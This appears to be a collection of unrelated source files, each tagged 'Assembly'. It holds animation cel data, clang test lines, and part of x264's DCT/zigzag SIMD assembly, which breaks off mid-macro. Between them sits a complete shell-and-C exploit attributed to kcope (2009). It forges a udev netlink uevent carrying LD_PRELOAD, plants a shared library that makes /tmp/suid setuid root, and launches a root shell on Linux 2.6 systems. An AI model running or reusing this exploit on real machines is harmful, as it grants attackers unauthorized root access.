CHECK-NEXT: 2 * 2 + 1 = 5
CHECK-NEXT: 2 * 3 + 1 = 7
CHECK-NEXT: 2 * 4 + 1 = 9
| {
"language": "Assembly"
} |
;---------------------------------------
;
; animation cel data
;
beds_data::
byte both + 1
byte 0b00100000
byte beds_start_end - beds_data
byte beds_contents_xy - beds_data
byte 252+right,32+left,255
byte 0b11111100
byte 0b11101100
word beds_data_a - beds_data
word beds_data_b - beds_data
word beds_data_c - beds_data
word beds_data_d - beds_data
word beds_data_e - beds_data
word beds_data_f - beds_data
beds_start_end:
byte 0,0,1,1
beds_contents_xy:
byte 249,13,253,13
beds_data_a:
byte cel_box + 0x01, 0x29, 0xf7, 0x00, 0x00, 0x00
byte 0xbe
beds_data_b:
byte cel_box + 0x01, 0x35, 0x04, 0x0c, 0x00, 0x00
byte 0xbe
beds_data_c:
byte cel_box + tb_bord + 0x0c, 0x13, 0xf8, 0xf3, 0x00, 0x00
byte 0q1111
beds_data_d:
byte 0x05, 0x08, 0xff, 0xfa, 0x00, 0x00
byte run,0x80+1
byte 2
byte 11
byte 47
byte 11
byte 2
byte run,0x80+2
byte 170
byte 255
byte 255
byte 170
byte 255
byte 255
byte 175
byte 10
byte 170
byte 255
byte 255
byte 170
byte run,3,255
byte 170
byte 170
byte 255
byte 255
byte 170
byte 255
byte 255
byte 254
byte 168
byte 128
byte 224
byte 248
byte 190
byte 248
byte 224
byte 128
byte run,0x80+1
beds_data_e:
byte 0x03, 0x04, 0xf6, 0x04, 0x00, 0x00
byte run,4,2
byte 255
byte 170
byte 255
byte 170
byte run,4,128
beds_data_f:
byte 0x03, 0x04, 0x03, 0x10, 0x00, 0x00
byte run,4,2
byte 255
byte 170
byte 255
byte 170
byte run,4,128
| {
"language": "Assembly"
} |
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -triple i386-unknown-unknown -emit-pch -o %t1 %S/pchpch1.h
// RUN: %clang_cc1 -triple i386-unknown-unknown -emit-pch -o %t2 %S/pchpch2.h -include-pch %t1
// RUN: %clang_cc1 -triple i386-unknown-unknown -fsyntax-only %s -include-pch %t2
// The purpose of this test is to make sure that a PCH created while including
// an existing PCH can be loaded.
| {
"language": "Assembly"
} |
;*****************************************************************************
;* dct-a.asm: x86 transform and zigzag
;*****************************************************************************
;* Copyright (C) 2003-2017 x264 project
;*
;* Authors: Holger Lubitz <[email protected]>
;* Loren Merritt <[email protected]>
;* Laurent Aimar <[email protected]>
;* Min Chen <chenm001.163.com>
;* Fiona Glaser <[email protected]>
;*
;* This program is free software; you can redistribute it and/or modify
;* it under the terms of the GNU General Public License as published by
;* the Free Software Foundation; either version 2 of the License, or
;* (at your option) any later version.
;*
;* This program is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
;* GNU General Public License for more details.
;*
;* You should have received a copy of the GNU General Public License
;* along with this program; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
;*
;* This program is also available under a commercial proprietary license.
;* For more information, contact us at [email protected].
;*****************************************************************************
%include "x86inc.asm"
%include "x86util.asm"
SECTION_RODATA 64
; AVX-512 permutation indices are bit-packed to save cache
%if HIGH_BIT_DEPTH
scan_frame_avx512: dd 0x00bf0200, 0x00fd7484, 0x0033a611, 0x0069d822 ; bits 0-3: 4x4_frame
dd 0x00a3ca95, 0x00dd8d08, 0x00e75b8c, 0x00a92919 ; bits 4-8: 8x8_frame1
dd 0x0072f6a6, 0x003c8433, 0x007e5247, 0x00b6a0ba ; bits 9-13: 8x8_frame2
dd 0x00ecf12d, 0x00f3239e, 0x00b9540b, 0x00ff868f ; bits 14-18: 8x8_frame3
; bits 19-23: 8x8_frame4
scan_field_avx512: dd 0x0006b240, 0x000735a1, 0x0007b9c2, 0x0009bde8 ; bits 0-4: 8x8_field1
dd 0x000c4e69, 0x000ce723, 0x000a0004, 0x000aeb4a ; bits 5-9: 8x8_field2
dd 0x000b5290, 0x000bd6ab, 0x000d5ac5, 0x000ddee6 ; bits 10-14: 8x8_field3
dd 0x000e6f67, 0x000e842c, 0x000f0911, 0x000ff058 ; bits 15-19: 8x8_field4
cavlc_shuf_avx512: dd 0x00018820, 0x000398a4, 0x0005a928, 0x0007b9ac ; bits 0-4: interleave1
dd 0x0009ca30, 0x000bdab4, 0x000deb38, 0x000ffbbc ; bits 5-9: interleave2
dd 0x00010c01, 0x00031c85, 0x00052d09, 0x00073d8d ; bits 10-14: interleave3
dd 0x00094e11, 0x000b5e95, 0x000d6f19, 0x000f7f9d ; bits 15-19: interleave4
%else
dct_avx512: dd 0x10000000, 0x00021104, 0x3206314c, 0x60042048 ; bits 0-4: dct8x8_fenc bits 5-9: dct8x8_fdec
dd 0x98008a10, 0x20029b14, 0xba06bb5c, 0x4004aa58 ; bits 10-13: dct16x16_fenc bits 14-18: dct16x16_fdec
dd 0x54004421, 0x80025525, 0x7606756d, 0xe0046469 ; bits(e) 24-27: idct8x8_idct1 bits(e) 28-31: idct8x8_idct2
dd 0xdc00ce31, 0xa002df35, 0xfe06ff7d, 0xc004ee79 ; bits(o) 24-31: idct8x8_gather
scan_frame_avx512: dw 0x7000, 0x5484, 0x3811, 0x1c22, 0x3c95, 0x5908, 0x758c, 0x9119 ; bits 0-3: 4x4_frame
dw 0xaca6, 0xc833, 0xe447, 0xe8ba, 0xcd2d, 0xb19e, 0x960b, 0x7a8f ; bits 4-9: 8x8_frame1
dw 0x5e10, 0x7da0, 0x9930, 0xb4c0, 0xd050, 0xec60, 0xf0d0, 0xd540 ; bits 10-15: 8x8_frame2
dw 0xb9b0, 0x9e20, 0xbe90, 0xdb00, 0xf780, 0xfb10, 0xdea0, 0xfe30
scan_field_avx512: dw 0x0700, 0x0741, 0x0782, 0x07c8, 0x08c9, 0x0a43, 0x0c04, 0x0a8a ; bits 0-5: 8x8_field1
dw 0x0910, 0x094b, 0x0985, 0x09c6, 0x0ac7, 0x0c4c, 0x0c91, 0x0b18 ; bits 6-11: 8x8_field2
dw 0x0b52, 0x0b8d, 0x0bce, 0x0ccf, 0x0e13, 0x0e59, 0x0d20, 0x0d5a
dw 0x0d94, 0x0dd5, 0x0e96, 0x0ed7, 0x0f1b, 0x0f61, 0x0fa8, 0x0fe2
cavlc_shuf_avx512: dw 0x0080, 0x0184, 0x0288, 0x038c, 0x0490, 0x0594, 0x0698, 0x079c ; bits 0-5: interleave1
dw 0x08a0, 0x09a4, 0x0aa8, 0x0bac, 0x0cb0, 0x0db4, 0x0eb8, 0x0fbc ; bits 6-11: interleave2
dw 0x00c1, 0x01c5, 0x02c9, 0x03cd, 0x04d1, 0x05d5, 0x06d9, 0x07dd
dw 0x08e1, 0x09e5, 0x0ae9, 0x0bed, 0x0cf1, 0x0df5, 0x0ef9, 0x0ffd
%endif
pw_ppmmmmpp: dw 1,1,-1,-1,-1,-1,1,1
pb_sub4frame: db 0,1,4,8,5,2,3,6,9,12,13,10,7,11,14,15
pb_sub4field: db 0,4,1,8,12,5,9,13,2,6,10,14,3,7,11,15
pb_subacmask: dw 0,-1,-1,-1,-1,-1,-1,-1
pb_scan4framea: SHUFFLE_MASK_W 6,3,7,0,4,1,2,5
pb_scan4frameb: SHUFFLE_MASK_W 0,4,1,2,5,6,3,7
pb_scan4frame2a: SHUFFLE_MASK_W 0,4,1,2,5,8,12,9
pb_scan4frame2b: SHUFFLE_MASK_W 6,3,7,10,13,14,11,15
pb_scan8framet1: SHUFFLE_MASK_W 0, 1, 6, 7, 8, 9, 13, 14
pb_scan8framet2: SHUFFLE_MASK_W 2 , 3, 4, 7, 9, 15, 10, 14
pb_scan8framet3: SHUFFLE_MASK_W 0, 1, 5, 6, 8, 11, 12, 13
pb_scan8framet4: SHUFFLE_MASK_W 0, 3, 4, 5, 8, 11, 12, 15
pb_scan8framet5: SHUFFLE_MASK_W 1, 2, 6, 7, 9, 10, 13, 14
pb_scan8framet6: SHUFFLE_MASK_W 0, 3, 4, 5, 10, 11, 12, 15
pb_scan8framet7: SHUFFLE_MASK_W 1, 2, 6, 7, 8, 9, 14, 15
pb_scan8framet8: SHUFFLE_MASK_W 0, 1, 2, 7, 8, 10, 11, 14
pb_scan8framet9: SHUFFLE_MASK_W 1, 4, 5, 7, 8, 13, 14, 15
pb_scan8frame1: SHUFFLE_MASK_W 0, 8, 1, 2, 9, 12, 4, 13
pb_scan8frame2: SHUFFLE_MASK_W 4, 0, 1, 5, 8, 10, 12, 14
pb_scan8frame3: SHUFFLE_MASK_W 12, 10, 8, 6, 2, 3, 7, 9
pb_scan8frame4: SHUFFLE_MASK_W 0, 1, 8, 12, 4, 13, 9, 2
pb_scan8frame5: SHUFFLE_MASK_W 5, 14, 10, 3, 11, 15, 6, 7
pb_scan8frame6: SHUFFLE_MASK_W 6, 8, 12, 13, 9, 7, 5, 3
pb_scan8frame7: SHUFFLE_MASK_W 1, 3, 5, 7, 10, 14, 15, 11
pb_scan8frame8: SHUFFLE_MASK_W 10, 3, 11, 14, 5, 6, 15, 7
pb_scan8field1 : SHUFFLE_MASK_W 0, 1, 2, 8, 9, 3, 4, 10
pb_scan8field2a: SHUFFLE_MASK_W 0x80, 11, 5, 6, 7, 12,0x80,0x80
pb_scan8field2b: SHUFFLE_MASK_W 0,0x80,0x80,0x80,0x80,0x80, 1, 8
pb_scan8field3a: SHUFFLE_MASK_W 10, 5, 6, 7, 11,0x80,0x80,0x80
pb_scan8field3b: SHUFFLE_MASK_W 0x80,0x80,0x80,0x80,0x80, 1, 8, 2
pb_scan8field4a: SHUFFLE_MASK_W 4, 5, 6, 7, 11,0x80,0x80,0x80
pb_scan8field6 : SHUFFLE_MASK_W 4, 5, 6, 7, 11,0x80,0x80, 12
pb_scan8field7 : SHUFFLE_MASK_W 5, 6, 7, 11,0x80,0x80, 12, 13
SECTION .text
cextern pw_32_0
cextern pw_32
cextern pw_512
cextern pw_8000
cextern pw_pixel_max
cextern hsub_mul
cextern pb_1
cextern pw_1
cextern pd_1
cextern pd_32
cextern pw_ppppmmmm
cextern pw_pmpmpmpm
cextern deinterleave_shufd
cextern pb_unpackbd1
cextern pb_unpackbd2
%macro WALSH4_1D 6
SUMSUB_BADC %1, %5, %4, %3, %2, %6
SUMSUB_BADC %1, %5, %3, %4, %2, %6
SWAP %2, %5, %4
%endmacro
%macro SUMSUB_17BIT 4 ; a, b, tmp, 0x8000
movq m%3, m%4
pxor m%1, m%4
psubw m%3, m%2
pxor m%2, m%4
pavgw m%3, m%1
pavgw m%2, m%1
pxor m%3, m%4
pxor m%2, m%4
SWAP %1, %2, %3
%endmacro
%macro DCT_UNPACK 3
punpcklwd %3, %1
punpckhwd %2, %1
psrad %3, 16
psrad %2, 16
SWAP %1, %3
%endmacro
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void dct4x4dc( dctcoef d[4][4] )
;-----------------------------------------------------------------------------
%macro DCT4x4_DC 0
cglobal dct4x4dc, 1,1,5
mova m0, [r0+ 0]
mova m1, [r0+16]
mova m2, [r0+32]
mova m3, [r0+48]
WALSH4_1D d, 0,1,2,3,4
TRANSPOSE4x4D 0,1,2,3,4
paddd m0, [pd_1]
WALSH4_1D d, 0,1,2,3,4
psrad m0, 1
psrad m1, 1
psrad m2, 1
psrad m3, 1
mova [r0+ 0], m0
mova [r0+16], m1
mova [r0+32], m2
mova [r0+48], m3
RET
%endmacro ; DCT4x4_DC
INIT_XMM sse2
DCT4x4_DC
INIT_XMM avx
DCT4x4_DC
%else
INIT_MMX mmx2
cglobal dct4x4dc, 1,1
movq m3, [r0+24]
movq m2, [r0+16]
movq m1, [r0+ 8]
movq m0, [r0+ 0]
movq m7, [pw_8000] ; convert to unsigned and back, so that pavgw works
WALSH4_1D w, 0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
SUMSUB_BADC w, 1, 0, 3, 2, 4
SWAP 0, 1
SWAP 2, 3
SUMSUB_17BIT 0,2,4,7
SUMSUB_17BIT 1,3,5,7
movq [r0+0], m0
movq [r0+8], m2
movq [r0+16], m3
movq [r0+24], m1
RET
%endif ; HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void idct4x4dc( int32_t d[4][4] )
;-----------------------------------------------------------------------------
%macro IDCT4x4DC 0
cglobal idct4x4dc, 1,1
mova m3, [r0+48]
mova m2, [r0+32]
mova m1, [r0+16]
mova m0, [r0+ 0]
WALSH4_1D d,0,1,2,3,4
TRANSPOSE4x4D 0,1,2,3,4
WALSH4_1D d,0,1,2,3,4
mova [r0+ 0], m0
mova [r0+16], m1
mova [r0+32], m2
mova [r0+48], m3
RET
%endmacro ; IDCT4x4DC
INIT_XMM sse2
IDCT4x4DC
INIT_XMM avx
IDCT4x4DC
%else
;-----------------------------------------------------------------------------
; void idct4x4dc( int16_t d[4][4] )
;-----------------------------------------------------------------------------
INIT_MMX mmx
cglobal idct4x4dc, 1,1
movq m3, [r0+24]
movq m2, [r0+16]
movq m1, [r0+ 8]
movq m0, [r0+ 0]
WALSH4_1D w,0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
WALSH4_1D w,0,1,2,3,4
movq [r0+ 0], m0
movq [r0+ 8], m1
movq [r0+16], m2
movq [r0+24], m3
RET
%endif ; HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void dct2x4dc( dctcoef dct[8], dctcoef dct4x4[8][16] )
;-----------------------------------------------------------------------------
%if WIN64
DECLARE_REG_TMP 6 ; Avoid some REX prefixes to reduce code size
%else
DECLARE_REG_TMP 2
%endif
%macro INSERT_COEFF 3 ; dst, src, imm
%if %3
%if HIGH_BIT_DEPTH
%if cpuflag(sse4)
pinsrd %1, %2, %3
%elif %3 == 2
movd m2, %2
%elif %3 == 1
punpckldq %1, %2
%else
punpckldq m2, %2
punpcklqdq %1, m2
%endif
%else
%if %3 == 2
punpckldq %1, %2
%else
pinsrw %1, %2, %3
%endif
%endif
%else
movd %1, %2
%endif
%if HIGH_BIT_DEPTH
mov %2, t0d
%else
mov %2, t0w
%endif
%endmacro
%macro DCT2x4DC 2
cglobal dct2x4dc, 2,3
xor t0d, t0d
INSERT_COEFF m0, [r1+0*16*SIZEOF_DCTCOEF], 0
INSERT_COEFF m0, [r1+1*16*SIZEOF_DCTCOEF], 2
add r1, 4*16*SIZEOF_DCTCOEF
INSERT_COEFF m0, [r1-2*16*SIZEOF_DCTCOEF], 1
INSERT_COEFF m0, [r1-1*16*SIZEOF_DCTCOEF], 3
INSERT_COEFF m1, [r1+0*16*SIZEOF_DCTCOEF], 0
INSERT_COEFF m1, [r1+1*16*SIZEOF_DCTCOEF], 2
INSERT_COEFF m1, [r1+2*16*SIZEOF_DCTCOEF], 1
INSERT_COEFF m1, [r1+3*16*SIZEOF_DCTCOEF], 3
SUMSUB_BA %1, 1, 0, 2
SBUTTERFLY %2, 1, 0, 2
SUMSUB_BA %1, 0, 1, 2
SBUTTERFLY %2, 0, 1, 2
SUMSUB_BA %1, 1, 0, 2
pshuf%1 m0, m0, q1032
mova [r0], m1
mova [r0+mmsize], m0
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
DCT2x4DC d, dq
INIT_XMM avx
DCT2x4DC d, dq
%else
INIT_MMX mmx2
DCT2x4DC w, wd
%endif
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void sub4x4_dct( dctcoef dct[4][4], pixel *pix1, pixel *pix2 )
;-----------------------------------------------------------------------------
INIT_MMX mmx
cglobal sub4x4_dct, 3,3
.skip_prologue:
LOAD_DIFF m0, m4, none, [r1+0*FENC_STRIDE], [r2+0*FDEC_STRIDE]
LOAD_DIFF m3, m4, none, [r1+6*FENC_STRIDE], [r2+6*FDEC_STRIDE]
LOAD_DIFF m1, m4, none, [r1+2*FENC_STRIDE], [r2+2*FDEC_STRIDE]
LOAD_DIFF m2, m4, none, [r1+4*FENC_STRIDE], [r2+4*FDEC_STRIDE]
DCT4_1D 0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
SUMSUB_BADC w, 3, 0, 2, 1
SUMSUB_BA w, 2, 3, 4
DCT_UNPACK m2, m4, m5
DCT_UNPACK m3, m6, m7
mova [r0+ 0], m2 ; s03 + s12
mova [r0+ 8], m4
mova [r0+32], m3 ; s03 - s12
mova [r0+40], m6
DCT_UNPACK m0, m2, m4
DCT_UNPACK m1, m3, m5
SUMSUB2_AB d, 0, 1, 4
SUMSUB2_AB d, 2, 3, 5
mova [r0+16], m0 ; d03*2 + d12
mova [r0+24], m2
mova [r0+48], m4 ; d03 - 2*d12
mova [r0+56], m5
RET
%else
%macro SUB_DCT4 0
cglobal sub4x4_dct, 3,3
.skip_prologue:
%if cpuflag(ssse3)
mova m5, [hsub_mul]
%endif
LOAD_DIFF8x4 0, 3, 1, 2, 4, 5, r1, r2
DCT4_1D 0,1,2,3,4
TRANSPOSE4x4W 0,1,2,3,4
DCT4_1D 0,1,2,3,4
movq [r0+ 0], m0
movq [r0+ 8], m1
movq [r0+16], m2
movq [r0+24], m3
RET
%endmacro
INIT_MMX mmx
SUB_DCT4
INIT_MMX ssse3
SUB_DCT4
%endif ; HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void add4x4_idct( pixel *p_dst, dctcoef dct[4][4] )
;-----------------------------------------------------------------------------
%macro STORE_DIFFx2 6
psrad %1, 6
psrad %2, 6
packssdw %1, %2
movq %3, %5
movhps %3, %6
paddsw %1, %3
CLIPW %1, %4, [pw_pixel_max]
movq %5, %1
movhps %6, %1
%endmacro
%macro ADD4x4_IDCT 0
cglobal add4x4_idct, 2,2,6
add r0, 2*FDEC_STRIDEB
.skip_prologue:
mova m1, [r1+16]
mova m3, [r1+48]
mova m2, [r1+32]
mova m0, [r1+ 0]
IDCT4_1D d,0,1,2,3,4,5
TRANSPOSE4x4D 0,1,2,3,4
paddd m0, [pd_32]
IDCT4_1D d,0,1,2,3,4,5
pxor m5, m5
STORE_DIFFx2 m0, m1, m4, m5, [r0-2*FDEC_STRIDEB], [r0-1*FDEC_STRIDEB]
STORE_DIFFx2 m2, m3, m4, m5, [r0+0*FDEC_STRIDEB], [r0+1*FDEC_STRIDEB]
RET
%endmacro
INIT_XMM sse2
ADD4x4_IDCT
INIT_XMM avx
ADD4x4_IDCT
%else ; !HIGH_BIT_DEPTH
INIT_MMX mmx
cglobal add4x4_idct, 2,2
pxor m7, m7
.skip_prologue:
movq m1, [r1+ 8]
movq m3, [r1+24]
movq m2, [r1+16]
movq m0, [r1+ 0]
IDCT4_1D w,0,1,2,3,4,5
TRANSPOSE4x4W 0,1,2,3,4
paddw m0, [pw_32]
IDCT4_1D w,0,1,2,3,4,5
STORE_DIFF m0, m4, m7, [r0+0*FDEC_STRIDE]
STORE_DIFF m1, m4, m7, [r0+1*FDEC_STRIDE]
STORE_DIFF m2, m4, m7, [r0+2*FDEC_STRIDE]
STORE_DIFF m3, m4, m7, [r0+3*FDEC_STRIDE]
RET
%macro ADD4x4 0
cglobal add4x4_idct, 2,2,6
mova m1, [r1+0x00] ; row1/row0
mova m3, [r1+0x10] ; row3/row2
psraw m0, m1, 1 ; row1>>1/...
psraw m2, m3, 1 ; row3>>1/...
movsd m0, m1 ; row1>>1/row0
movsd m2, m3 ; row3>>1/row2
psubw m0, m3 ; row1>>1-row3/row0-2
paddw m2, m1 ; row3>>1+row1/row0+2
SBUTTERFLY2 wd, 0, 2, 1
SUMSUB_BA w, 2, 0, 1
pshuflw m1, m2, q2301
pshufhw m2, m2, q2301
punpckldq m1, m0
punpckhdq m2, m0
SWAP 0, 1
mova m1, [pw_32_0]
paddw m1, m0 ; row1/row0 corrected
psraw m0, 1 ; row1>>1/...
psraw m3, m2, 1 ; row3>>1/...
movsd m0, m1 ; row1>>1/row0
movsd m3, m2 ; row3>>1/row2
psubw m0, m2 ; row1>>1-row3/row0-2
paddw m3, m1 ; row3>>1+row1/row0+2
SBUTTERFLY2 qdq, 0, 3, 1
SUMSUB_BA w, 3, 0, 1
movd m4, [r0+FDEC_STRIDE*0]
movd m1, [r0+FDEC_STRIDE*1]
movd m2, [r0+FDEC_STRIDE*2]
movd m5, [r0+FDEC_STRIDE*3]
punpckldq m1, m4 ; row0/row1
pxor m4, m4
punpckldq m2, m5 ; row3/row2
punpcklbw m1, m4
psraw m3, 6
punpcklbw m2, m4
psraw m0, 6
paddsw m3, m1
paddsw m0, m2
packuswb m0, m3 ; row0/row1/row3/row2
pextrd [r0+FDEC_STRIDE*0], m0, 3
pextrd [r0+FDEC_STRIDE*1], m0, 2
movd [r0+FDEC_STRIDE*2], m0
pextrd [r0+FDEC_STRIDE*3], m0, 1
RET
%endmacro ; ADD4x4
INIT_XMM sse4
ADD4x4
INIT_XMM avx
ADD4x4
%macro STOREx2_AVX2 9
movq xm%3, [r0+%5*FDEC_STRIDE]
vinserti128 m%3, m%3, [r0+%6*FDEC_STRIDE], 1
movq xm%4, [r0+%7*FDEC_STRIDE]
vinserti128 m%4, m%4, [r0+%8*FDEC_STRIDE], 1
punpcklbw m%3, m%9
punpcklbw m%4, m%9
psraw m%1, 6
psraw m%2, 6
paddsw m%1, m%3
paddsw m%2, m%4
packuswb m%1, m%2
vextracti128 xm%2, m%1, 1
movq [r0+%5*FDEC_STRIDE], xm%1
movq [r0+%6*FDEC_STRIDE], xm%2
movhps [r0+%7*FDEC_STRIDE], xm%1
movhps [r0+%8*FDEC_STRIDE], xm%2
%endmacro
INIT_YMM avx2
cglobal add8x8_idct, 2,3,8
add r0, 4*FDEC_STRIDE
pxor m7, m7
TAIL_CALL .skip_prologue, 0
global current_function %+ .skip_prologue
.skip_prologue:
; TRANSPOSE4x4Q
mova xm0, [r1+ 0]
mova xm1, [r1+32]
mova xm2, [r1+16]
mova xm3, [r1+48]
vinserti128 m0, m0, [r1+ 64], 1
vinserti128 m1, m1, [r1+ 96], 1
vinserti128 m2, m2, [r1+ 80], 1
vinserti128 m3, m3, [r1+112], 1
SBUTTERFLY qdq, 0, 1, 4
SBUTTERFLY qdq, 2, 3, 4
IDCT4_1D w,0,1,2,3,4,5
TRANSPOSE2x4x4W 0,1,2,3,4
paddw m0, [pw_32]
IDCT4_1D w,0,1,2,3,4,5
STOREx2_AVX2 0, 1, 4, 5, -4, 0, -3, 1, 7
STOREx2_AVX2 2, 3, 4, 5, -2, 2, -1, 3, 7
ret
; 2xdst, 2xtmp, 4xsrcrow, 1xzero
%macro LOAD_DIFF8x2_AVX2 9
movq xm%1, [r1+%5*FENC_STRIDE]
movq xm%2, [r1+%6*FENC_STRIDE]
vinserti128 m%1, m%1, [r1+%7*FENC_STRIDE], 1
vinserti128 m%2, m%2, [r1+%8*FENC_STRIDE], 1
punpcklbw m%1, m%9
punpcklbw m%2, m%9
movq xm%3, [r2+(%5-4)*FDEC_STRIDE]
movq xm%4, [r2+(%6-4)*FDEC_STRIDE]
vinserti128 m%3, m%3, [r2+(%7-4)*FDEC_STRIDE], 1
vinserti128 m%4, m%4, [r2+(%8-4)*FDEC_STRIDE], 1
punpcklbw m%3, m%9
punpcklbw m%4, m%9
psubw m%1, m%3
psubw m%2, m%4
%endmacro
; 4x src, 1x tmp
%macro STORE8_DCT_AVX2 5
SBUTTERFLY qdq, %1, %2, %5
SBUTTERFLY qdq, %3, %4, %5
mova [r0+ 0], xm%1
mova [r0+ 16], xm%3
mova [r0+ 32], xm%2
mova [r0+ 48], xm%4
vextracti128 [r0+ 64], m%1, 1
vextracti128 [r0+ 80], m%3, 1
vextracti128 [r0+ 96], m%2, 1
vextracti128 [r0+112], m%4, 1
%endmacro
%macro STORE16_DCT_AVX2 5
SBUTTERFLY qdq, %1, %2, %5
SBUTTERFLY qdq, %3, %4, %5
mova [r0+ 0-128], xm%1
mova [r0+16-128], xm%3
mova [r0+32-128], xm%2
mova [r0+48-128], xm%4
vextracti128 [r0+ 0], m%1, 1
vextracti128 [r0+16], m%3, 1
vextracti128 [r0+32], m%2, 1
vextracti128 [r0+48], m%4, 1
%endmacro
INIT_YMM avx2
cglobal sub8x8_dct, 3,3,7
pxor m6, m6
add r2, 4*FDEC_STRIDE
LOAD_DIFF8x2_AVX2 0, 1, 4, 5, 0, 1, 4, 5, 6
LOAD_DIFF8x2_AVX2 2, 3, 4, 5, 2, 3, 6, 7, 6
DCT4_1D 0, 1, 2, 3, 4
TRANSPOSE2x4x4W 0, 1, 2, 3, 4
DCT4_1D 0, 1, 2, 3, 4
STORE8_DCT_AVX2 0, 1, 2, 3, 4
RET
INIT_YMM avx2
cglobal sub16x16_dct, 3,3,6
add r0, 128
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
add r0, 64
add r1, 4*FENC_STRIDE
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
add r0, 256-64
add r1, 4*FENC_STRIDE
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
add r0, 64
add r1, 4*FENC_STRIDE
add r2, 4*FDEC_STRIDE
call .sub16x4_dct
RET
.sub16x4_dct:
LOAD_DIFF16x2_AVX2 0, 1, 4, 5, 0, 1
LOAD_DIFF16x2_AVX2 2, 3, 4, 5, 2, 3
DCT4_1D 0, 1, 2, 3, 4
TRANSPOSE2x4x4W 0, 1, 2, 3, 4
DCT4_1D 0, 1, 2, 3, 4
STORE16_DCT_AVX2 0, 1, 2, 3, 4
ret
%macro DCT4x4_AVX512 0
psubw m0, m2 ; 0 1
psubw m1, m3 ; 3 2
SUMSUB_BA w, 1, 0, 2
SBUTTERFLY wd, 1, 0, 2
paddw m2, m1, m0
psubw m3, m1, m0
paddw m2 {k1}, m1 ; 0+1+2+3 0<<1+1-2-3<<1
psubw m3 {k1}, m0 ; 0-1-2+3 0-1<<1+2<<1-3
shufps m1, m2, m3, q2323 ; a3 b3 a2 b2 c3 d3 c2 d2
punpcklqdq m2, m3 ; a0 b0 a1 b1 c0 d0 c1 d1
SUMSUB_BA w, 1, 2, 3
shufps m3, m1, m2, q3131 ; a1+a2 b1+b2 c1+c2 d1+d2 a1-a2 b1-b2 b1-b2 d1-d2
shufps m1, m2, q2020 ; a0+a3 b0+b3 c0+c3 d0+d3 a0-a3 b0-b3 c0-c3 d0-d3
paddw m2, m1, m3
psubw m0, m1, m3
paddw m2 {k2}, m1 ; 0'+1'+2'+3' 0'<<1+1'-2'-3'<<1
